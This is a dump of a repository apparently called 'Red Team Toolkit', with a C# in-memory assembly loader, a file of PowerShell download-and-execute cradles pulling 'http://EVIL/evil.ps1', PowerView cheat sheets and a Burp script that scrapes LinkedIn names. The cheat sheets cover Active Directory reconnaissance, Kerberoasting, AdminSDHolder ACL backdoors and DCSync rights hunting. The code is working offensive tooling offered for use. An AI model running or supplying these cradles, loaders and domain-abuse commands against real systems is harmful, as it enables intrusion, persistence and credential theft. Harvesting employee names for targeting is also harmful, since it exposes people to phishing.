├── .keep ├── Labs └── .keep ├── Staging └── .keep ├── References ├── .keep ├── DownloadCradles.ps1 ├── PowerView-2.0-tricks.ps1 └── PowerView-3.0-tricks.ps1 ├── Initial_access ├── .keep ├── Phishing │ └── .keep └── DotnetAssemblyDownloadCradle.cs ├── Lateral_movement ├── .keep └── PowerView-with-RemoteAccessPolicyEnumeration.ps1 ├── Reconnaissance ├── .keep └── People │ └── scrape-google-linkedin.burp-python-script.txt ├── Actions_on_objectives └── .keep ├── Command_and_control └── .keep ├── Establish_foothold └── .keep ├── README.md └── .gitmodules /.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Labs/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Staging/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /References/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Initial_access/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Lateral_movement/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Reconnaissance/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Actions_on_objectives/.keep: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /Command_and_control/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Establish_foothold/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Initial_access/Phishing/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Initial_access/DotnetAssemblyDownloadCradle.cs: -------------------------------------------------------------------------------- 1 | public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red Team Toolkit 2 | 3 | A collection of tools that aid in red team operations. 4 | 5 | Use 6 | 7 | git clone --recursive 8 | 9 | or if that is too late... 
10 | 11 | git submodule update --init --recursive 12 | 13 | 14 | pull requests welcomed 15 | 16 | TODO: Add modules and credits here -------------------------------------------------------------------------------- /Reconnaissance/People/scrape-google-linkedin.burp-python-script.txt: -------------------------------------------------------------------------------- 1 | if not messageIsRequest: 2 | response = messageInfo.getResponse() 3 | analyzedResponse = helpers.analyzeResponse(response) 4 | headerList = analyzedResponse.getHeaders() 5 | bodyStr = helpers.bytesToString(response[analyzedResponse.getBodyOffset():]).encode('ascii','ignore') 6 | if "| Professional Profile - LinkedIn" in bodyStr: 7 | strs = bodyStr.split("| Professional Profile - LinkedIn") 8 | strs.pop(-1) #remove the last item 9 | for str in strs: 10 | try: 11 | name = (str.rsplit("x3e",1)[1]).strip() 12 | except: 13 | x="test" 14 | try: 15 | name = (str.rsplit("\">",1)[1]).strip() 16 | if "=\"" in name: 17 | name = str.rsplit("=\"",1)[1] 18 | if "" in name: 19 | name = (str.rsplit("<title>",1)[1]).strip() 20 | except: 21 | x="test" 22 | print name 23 | if "| LinkedIn" in bodyStr: 24 | strs = bodyStr.split("| LinkedIn") 25 | strs.pop(-1) #remove the last item 26 | for str in strs: 27 | try: 28 | name = (str.rsplit("x3e",1)[1]).strip() 29 | except: 30 | x="test" 31 | try: 32 | name = (str.rsplit("\">",1)[1]).strip() 33 | if "=\"" in name: 34 | name = str.rsplit("=\"",1)[1] 35 | if "<title>" in name: 36 | name = (str.rsplit("<title>",1)[1]).strip() 37 | except: 38 | x="test" 39 | print name 40 | -------------------------------------------------------------------------------- /References/DownloadCradles.ps1: -------------------------------------------------------------------------------- 1 | # normal download cradle 2 | IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") 3 | 4 | # PowerShell 3.0+ 5 | IEX (iwr 'http://EVIL/evil.ps1') 6 | 7 | # hidden IE com object 8 | $ie=New-Object 
-comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r 9 | 10 | # Msxml2.XMLHTTP COM object 11 | $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText 12 | 13 | # WinHttp COM object (not proxy aware!) 14 | $h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText 15 | 16 | # using bitstransfer- touches disk! 17 | Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r 18 | 19 | # DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1) 20 | # code to execute needs to be a base64 encoded string stored in a TXT record 21 | IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0])))) 22 | 23 | # from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d 24 | <# 25 | <?xml version="1.0"?> 26 | <command> 27 | <a> 28 | <execute>Get-Process</execute> 29 | </a> 30 | </command> 31 | #> 32 | $a = New-Object System.Xml.XmlDocument 33 | $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") 34 | $a.command.a.execute | iex 35 | -------------------------------------------------------------------------------- /References/PowerView-2.0-tricks.ps1: -------------------------------------------------------------------------------- 1 | # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) 2 | # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 3 | 4 | # get all the groups a user is effectively a member of, 'recursing up' 5 
| Get-NetGroup -UserName <USER> 6 | 7 | # get all the effective members of a group, 'recursing down' 8 | Get-NetGroupMember -GoupName <GROUP> -Recurse 9 | 10 | # get the effective set of users who can administer a server 11 | Get-NetLocalGroup -Recurse SERVER.domain.local 12 | 13 | # retrieve all the computers a GPP password applies to 14 | Get-NetOU -GUID <GPP_GUID> | %{ Get-NetComputer -ADSPath $_ } 15 | 16 | # get all users with passwords changed > 1 year ago 17 | $Date = (Get-Date).AddYears(-1).ToFileTime() 18 | Get-NetUser -Filter "(pwdlastset<=$Date)" 19 | # all enabled users 20 | Get-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" 21 | # all disabled users 22 | Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)" 23 | # all users that require smart card authentication 24 | Get-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)" 25 | # all users that don't require smart card authentication 26 | Get-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" 27 | 28 | # enumerate all servers that allow unconstrained delegation, and all users that aren't marked as sensitive/not for delegation 29 | $Computers = Get-NetComputer -Unconstrained 30 | $Users = Get-NetUser -AllowDelegation -AdminCount 31 | 32 | # enumerate servers that allow unconstrained kerberos delegation and show all users logged in 33 | Invoke-UserHunter -Unconstrained -ShowAll 34 | 35 | # hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation 36 | Invoke-UserHunter -Unconstrained -AdminCount -AllowDelegation 37 | 38 | # Get the logged on users for all machines in any *server* OU in a particular domain 39 | Get-NetOU *server* -Domain <domain> | %{Get-NetComputer -ADSPath $_ | %{Get-NetLoggedOn -ComputerName $_}} 40 | 41 | # find all users with an SPN set (likely service accounts) 42 | Get-NetUser -SPN 43 | 44 | # find all service accounts in "Domain Admins" 45 | Get-NetUser -SPN | 
?{$_.memberof -match 'Domain Admins'} 46 | 47 | # hunt for all privileged users (adminCount=1) 48 | Invoke-UserHunter -AdminCount 49 | 50 | # find users with sidHistory set 51 | Get-NetUser -Filter '(sidHistory=*)' 52 | 53 | # enumerate all gobal catalogs in the forest 54 | Get-NetForestCatalog 55 | 56 | # turn a list of computer short names to FQDNs 57 | gc computers.txt | % {Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)"} 58 | 59 | # find interesting .vbs/.bat/.ps1 scripts on domain controllers 60 | Invoke-FileFinder -SearchSYSVol 61 | 62 | # enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through 63 | $DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>] 64 | $DomainPolicy.KerberosPolicy # useful for golden tickets ;) 65 | $DomainPolicy.SystemAccess 66 | 67 | # enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default 68 | $DcPolicy = Get-DomainPolicy -Source DC -ResolveSids 69 | $DcPolicy.PrivilegeRights 70 | 71 | # enumerate what machines that a particular group has local admin rights to 72 | Find-GPOLocation -GroupName <GROUP> 73 | 74 | # enumerate what machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DC 75 | Find-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP 76 | 77 | # export a csv of all GPO mappings 78 | Find-GPOLocation | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv 79 | 80 | # use alternate credentials for searching for files on the domain 81 | $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force 82 | $Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password) 83 | Invoke-FileFinder -Domain DOMAIN -Credential $Credential 84 | 85 | # enumerate who has rights to the 'matt' user in 
'testlab.local', resolving rights GUIDs to names 86 | Get-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs 87 | 88 | # grant user 'will' the rights to change 'matt's password 89 | Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword 90 | 91 | # audit the permissions of AdminSDHolder, resolving GUIDs 92 | Get-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs 93 | 94 | # backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse 95 | Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All 96 | 97 | # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 98 | Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { 99 | ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') 100 | } 101 | 102 | # find linked DA accounts using name correlation 103 | Get-NetGroupMember -GroupName "Domain Admins" | %{ Get-NetUser $_.membername } | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" } | Select-Object -Property displayname,samaccountname 104 | 105 | # save a PowerView object to disk for later usage 106 | Get-NetUser | Export-Clixml user.out 107 | $Users = Import-Clixml user.out 108 | 109 | # Find any machine accounts in privileged groups 110 | Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'} 111 | 112 | # Enumerate permissions for GPOs where users have some kind of modify rights 113 | Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )} 114 | 115 | # find all policies applied to a current machine 116 | Get-NetGPO -ComputerName WINDOWS1.testlab.local 117 | 118 | # find the user/groups that have read access to the LAPS password 
property for a specified computer 119 | Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData | 120 | Select-Object -ExpandProperty distinguishedname | 121 | ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object { 122 | Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_ 123 | } | Where-Object { 124 | ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and 125 | ($_.ActiveDirectoryRights -match 'ReadProperty') 126 | } | ForEach-Object { 127 | Convert-NameToSid $_.IdentityReference 128 | } | Select-Object -ExpandProperty SID | Get-ADObject 129 | 130 | # get the ACLs for all OUs where someone is allowed to read the LAPS password attribute 131 | Get-NetOU -FullData | 132 | Get-ObjectAcl -ResolveGUIDs | 133 | Where-Object { 134 | ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and 135 | ($_.ActiveDirectoryRights -match 'ReadProperty') 136 | } | ForEach-Object { 137 | $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; 138 | $_ 139 | } 140 | 141 | # perform a user 'zone transfer' by exporting all AD DNS records from all zones, exporting to a .csv 142 | Get-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv 143 | 144 | # return all universal security groups in a forest with foreign members 145 | Get-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname,distinguishedname,member | ForEach-Object { 146 | $GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC=")) 147 | $_.Member = $_.Member | ForEach-Object { 148 | $MemberDomain = $_.subString($_.IndexOf("DC=")) 149 | if($GroupDomain -ne $MemberDomain) { 150 | $_ 151 | } 152 | } 153 | $_ 154 | } | Where-Object {$_.Member} 155 | -------------------------------------------------------------------------------- /References/PowerView-3.0-tricks.ps1: -------------------------------------------------------------------------------- 1 | # PowerView's last major overhaul is detailed here: 
http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ 2 | # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c 3 | 4 | # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: 5 | # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 6 | 7 | # New function naming schema: 8 | # Verbs: 9 | # Get : retrieve full raw data sets 10 | # Find : ‘find’ specific data entries in a data set 11 | # Add : add a new object to a destination 12 | # Set : modify a given object 13 | # Invoke : lazy catch-all 14 | # Nouns: 15 | # Verb-Domain* : indicates that LDAP/.NET querying methods are being executed 16 | # Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration 17 | # Verb-Net* : indicates that Win32 API access is being used under the hood 18 | 19 | 20 | # get all the groups a user is effectively a member of, 'recursing up' using tokenGroups 21 | Get-DomainGroup -MemberIdentity <User/Group> 22 | 23 | # get all the effective members of a group, 'recursing down' 24 | Get-DomainGroupMember -Identity "Domain Admins" -Recurse 25 | 26 | # use an alternate credential for any function 27 | $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' 
-AsPlainText -Force 28 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 29 | Get-DomainUser -Credential $Cred 30 | 31 | # retrieve all the computer dns host names a GPP password applies to 32 | Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname} 33 | 34 | # get all users with passwords changed > 1 year ago, returning sam account names and password last set times 35 | $Date = (Get-Date).AddYears(-1).ToFileTime() 36 | Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset 37 | 38 | # all enabled users, returning distinguishednames 39 | Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname 40 | Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname 41 | 42 | # all disabled users 43 | Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)" 44 | Get-DomainUser -UACFilter ACCOUNTDISABLE 45 | 46 | # all users that require smart card authentication 47 | Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)" 48 | Get-DomainUser -UACFilter SMARTCARD_REQUIRED 49 | 50 | # all users that *don't* require smart card authentication, only returning sam account names 51 | Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname 52 | Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname 53 | 54 | # use multiple identity types for any *-Domain* function 55 | 'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff 56 | 57 | # find all users with an SPN set (likely service accounts) 58 | Get-DomainUser -SPN 59 | 60 | # check for users who don't have kerberos preauthentication set 61 | Get-DomainUser -PreauthNotRequired 
62 | Get-DomainUser -UACFilter DONT_REQ_PREAUTH 63 | 64 | # find all service accounts in "Domain Admins" 65 | Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'} 66 | 67 | # find users with sidHistory set 68 | Get-DomainUser -LDAPFilter '(sidHistory=*)' 69 | 70 | # find any users/computers with constrained delegation st 71 | Get-DomainUser -TrustedToAuth 72 | Get-DomainComputer -TrustedToAuth 73 | 74 | # enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation 75 | $Computers = Get-DomainComputer -Unconstrained 76 | $Users = Get-DomainUser -AllowDelegation -AdminCount 77 | 78 | # return the local *groups* of a remote server 79 | Get-NetLocalGroup SERVER.domain.local 80 | 81 | # return the local group *members* of a remote server using Win32 API methods (faster but less info) 82 | Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local 83 | 84 | # Kerberoast any users in a particular OU with SPNs set 85 | Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" 86 | 87 | # Find-DomainUserLocation == old Invoke-UserHunter 88 | # enumerate servers that allow unconstrained Kerberos delegation and show all users logged in 89 | Find-DomainUserLocation -ComputerUnconstrained -ShowAll 90 | 91 | # hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation 92 | Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation 93 | 94 | # find all computers in a given OU 95 | Get-DomainComputer -SearchBase "ldap://OU=..." 
96 | 97 | # Get the logged on users for all machines in any *server* OU in a particular domain 98 | Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}} 99 | 100 | # enumerate all gobal catalogs in the forest 101 | Get-ForestGlobalCatalog 102 | 103 | # turn a list of computer short names to FQDNs, using a global catalog 104 | gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname} 105 | 106 | # enumerate the current domain controller policy 107 | $DCPolicy = Get-DomainPolicy -Policy DC 108 | $DCPolicy.PrivilegeRights # user privilege rights on the dc... 109 | 110 | # enumerate the current domain policy 111 | $DomainPolicy = Get-DomainPolicy -Policy Domain 112 | $DomainPolicy.KerberosPolicy # useful for golden tickets ;) 113 | $DomainPolicy.SystemAccess # password age/etc. 114 | 115 | # enumerate what machines that a particular user/group identity has local admin rights to 116 | # Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation 117 | Get-DomainGPOUserLocalGroupMapping -Identity <User/Group> 118 | 119 | # enumerate what machines that a given user in the specified domain has RDP access rights to 120 | Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP 121 | 122 | # export a csv of all GPO mappings 123 | Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv 124 | 125 | # use alternate credentials for searching for files on the domain 126 | # Find-InterestingDomainShareFile == old Invoke-FileFinder 127 | $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force 128 | $Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password) 129 | Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential 130 | 131 | # enumerate who has rights 
to the 'matt' user in 'testlab.local', resolving rights GUIDs to names 132 | Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local 133 | 134 | # grant user 'will' the rights to change 'matt's password 135 | Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose 136 | 137 | # audit the permissions of AdminSDHolder, resolving GUIDs 138 | Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs 139 | 140 | # backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse 141 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All 142 | 143 | # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 144 | Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { 145 | ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') 146 | } 147 | 148 | # find linked DA accounts using name correlation 149 | Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname} 150 | 151 | # save a PowerView object to disk for later usage 152 | Get-DomainUser | Export-Clixml user.xml 153 | $Users = Import-Clixml user.xml 154 | 155 | # Find any machine accounts in privileged groups 156 | Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} 157 | 158 | # Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights 159 | Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? 
{ ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} 160 | 161 | # find all policies applied to a current machine 162 | Get-DomainGPO -ComputerIdentity windows1.testlab.local 163 | 164 | # enumerate all groups in a domain that don't have a global scope, returning just group names 165 | Get-DomainGroup -GroupScope NotGlobal -Properties name 166 | 167 | # enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships 168 | # query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames 169 | $ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname 170 | $Domains = @{} 171 | $ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) { 172 | # extract the domain the foreign user was added to 173 | $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 174 | # check if we've already enumerated this domain 175 | if (-not $Domains[$ForeignUserDomain]) { 176 | $Domains[$ForeignUserDomain] = $True 177 | # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set 178 | $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))" 179 | Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member 180 | } 181 | } 182 | $ForeignMemberships | fl 183 | 184 | # if running in -sta mode, impersonate another credential a la "runas /netonly" 185 | $SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force 186 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 187 | Invoke-UserImpersonation -Credential $Cred 188 | # ... action 189 | Invoke-RevertToSelf 190 | 191 | # enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer 192 | Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier 193 | 194 | # set the specified property for the given user identity 195 | Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose 196 | 197 | # Set the owner of 'dfm' in the current domain to 'harmj0y' 198 | Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y 199 | 200 | # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 201 | Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { 202 | ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') 203 | } 204 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "References/Awesome-Red-Teaming"] 2 | path = References/Awesome-Red-Teaming 3 | url = https://github.com/quikilr/Awesome-Red-Teaming.git 4 | [submodule "Labs/AutomatedLab"] 5 | path = Labs/AutomatedLab 6 | url = https://github.com/quikilr/AutomatedLab.git 7 | [submodule "Labs/DetectionLab"] 8 | path = Labs/DetectionLab 9 | url = https://github.com/clong/DetectionLab.git 10 | [submodule "Initial_access/Payload_generation/demiguise"] 11 | path = Initial_access/Payload_generation/demiguise 12 | url = https://github.com/nccgroup/demiguise.git 13 | [submodule "Initial_access/Payload_generation/EmbedInHTML"] 14 | path = Initial_access/Payload_generation/EmbedInHTML 15 | url = https://github.com/Arno0x/EmbedInHTML.git 16 | [submodule "Initial_access/Payload_generation/CACTUSTORCH"] 17 
| path = Initial_access/Payload_generation/CACTUSTORCH 18 | url = https://github.com/mdsecactivebreach/CACTUSTORCH.git 19 | [submodule "Initial_access/Payload_generation/morphHTA"] 20 | path = Initial_access/Payload_generation/morphHTA 21 | url = https://github.com/mdsecactivebreach/morphHTA.git 22 | [submodule "Initial_access/Payload_generation/genHTA"] 23 | path = Initial_access/Payload_generation/genHTA 24 | url = https://github.com/mdsecactivebreach/genHTA.git 25 | [submodule "Reconnaissance/People/LinkedInt"] 26 | path = Reconnaissance/People/LinkedInt 27 | url = https://github.com/mdsecactivebreach/LinkedInt.git 28 | [submodule "Initial_access/Federated_services/LyncSniper"] 29 | path = Initial_access/Federated_services/LyncSniper 30 | url = https://github.com/mdsecactivebreach/LyncSniper.git 31 | [submodule "Initial_access/Federated_services/ruler"] 32 | path = Initial_access/Federated_services/ruler 33 | url = https://github.com/sensepost/ruler.git 34 | [submodule "Initial_access/Federated_services/MailSniper"] 35 | path = Initial_access/Federated_services/MailSniper 36 | url = https://github.com/dafthack/MailSniper.git 37 | [submodule "Initial_access/Targeting/EmailAddressMangler"] 38 | path = Initial_access/Targeting/EmailAddressMangler 39 | url = https://github.com/dafthack/EmailAddressMangler.git 40 | [submodule "Initial_access/Targeting/statistically-likely-usernames"] 41 | path = Initial_access/Targeting/statistically-likely-usernames 42 | url = https://github.com/insidetrust/statistically-likely-usernames.git 43 | [submodule "Initial_access/Payload_generation/GreatSCT"] 44 | path = Initial_access/Payload_generation/GreatSCT 45 | url = https://github.com/GreatSCT/GreatSCT.git 46 | [submodule "Initial_access/Payload_generation/Office-DDE-Payloads"] 47 | path = Initial_access/Payload_generation/Office-DDE-Payloads 48 | url = https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads.git 49 | [submodule "Initial_access/Payload_generation/unicorn"] 50 | path 
= Initial_access/Payload_generation/unicorn 51 | url = https://github.com/trustedsec/unicorn.git 52 | [submodule "Staging/Chameleon"] 53 | path = Staging/Chameleon 54 | url = https://github.com/mdsecactivebreach/Chameleon.git 55 | [submodule "Staging/domainhunter"] 56 | path = Staging/domainhunter 57 | url = https://github.com/threatexpress/domainhunter.git 58 | [submodule "Staging/FindFrontableDomains"] 59 | path = Staging/FindFrontableDomains 60 | url = https://github.com/rvrsh3ll/FindFrontableDomains.git 61 | [submodule "References/CheatSheets"] 62 | path = References/CheatSheets 63 | url = https://github.com/HarmJ0y/CheatSheets.git 64 | [submodule "Lateral_movement/PowerSploit"] 65 | path = Lateral_movement/PowerSploit 66 | url = https://github.com/PowerShellMafia/PowerSploit/ 67 | [submodule "Lateral_movement/BloodHound"] 68 | path = Lateral_movement/BloodHound 69 | url = https://github.com/BloodHoundAD/BloodHound.git 70 | [submodule "Lateral_movement/Inveigh"] 71 | path = Lateral_movement/Inveigh 72 | url = https://github.com/Kevin-Robertson/Inveigh.git 73 | [submodule "Lateral_movement/nishang"] 74 | path = Lateral_movement/nishang 75 | url = https://github.com/samratashok/nishang.git 76 | [submodule "Lateral_movement/PowerUpSQL"] 77 | path = Lateral_movement/PowerUpSQL 78 | url = https://github.com/NetSPI/PowerUpSQL.git 79 | [submodule "Lateral_movement/SessionGopher"] 80 | path = Lateral_movement/SessionGopher 81 | url = https://github.com/fireeye/SessionGopher.git 82 | [submodule "Lateral_movement/Misc-PowerShell-Stuff"] 83 | path = Lateral_movement/Misc-PowerShell-Stuff 84 | url = https://github.com/enigma0x3/Misc-PowerShell-Stuff.git 85 | [submodule "Initial_access/subTee-gits-backups"] 86 | path = Initial_access/subTee-gits-backups 87 | url = https://github.com/re4lity/subTee-gits-backups.git 88 | [submodule "Reconnaissance/People/raven"] 89 | path = Reconnaissance/People/raven 90 | url = https://github.com/0x09AL/raven.git 91 | [submodule 
